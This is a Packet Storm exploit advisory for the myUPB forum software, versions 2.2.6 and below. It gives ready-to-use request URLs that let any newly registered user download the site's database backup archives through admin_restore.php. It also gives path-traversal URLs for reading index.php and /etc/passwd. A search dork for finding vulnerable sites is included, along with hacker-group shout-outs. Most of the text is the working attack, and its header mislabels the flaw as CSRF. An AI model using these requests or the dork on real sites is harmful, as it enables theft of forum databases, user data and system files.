myUPB versions 2.2.6 and below suffer from backup related and local file inclusion vulnerabilities.
4fc0bd6b5ff6a7da33c3905788f5d628e6fe864f72b7b1f4bd94005c7d20923c
=============== altbta ======================
#Name: myUPB <= v2.2.6 Multiple Vulnerabilities
#Download: http://sourceforge.net/projects/textmb/files/UPB/
#Vulnerability: CSRF privilege escalation
#Tested on: 2.2.6
#Author : altbta (l_9@hotmail.com)
#Dork: "Powered by myUPB"
================= backup exploit: ==============
backup exploit:
register.php
http://localhost/upb/register.php
go too
http://localhost/upb/admin_restore.php?action=download
Download:
upbdatabackup_v2.2.6_06.21.2010.1277118622.zip
upbdatabackup_v2.2.6_06.21.2010.1277118651.zip
upbdatabackup_v2.2.6_06.21.2010.1277118703.zip
upbdatabackup_v2.2.6_06.21.2010.1277118704.zip
http://localhost/upb/admin_restore.php?action=download&file=upbdatabackup_v2.2.6_06.21.2010.1277118704.zip
================= LFI exploit: ==============
LFI exploit:
register.php
http://localhost/upb/register.php
go too
http://localhost/upb/admin_restore.php?action=download&file=../../../index.php
http://localhost/upb/admin_restore.php?action=download&file=../../../../../../../etc/passwd
#####################################################################
RoMaNcYxHaCkEr & sad hacker & ab0-3th4b & Mr.SaFa7 & Mn7oS & V ! V 3
Evil-Cod3r & asL-Sabia & ! Dr.www ! & MaKKaWi & ZaIdOoHxHaCkEr & al.bito
SnIpEr.SiTeS & R3d-D3v!L
xp10.me/xp10 & v4-team.com/cc
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed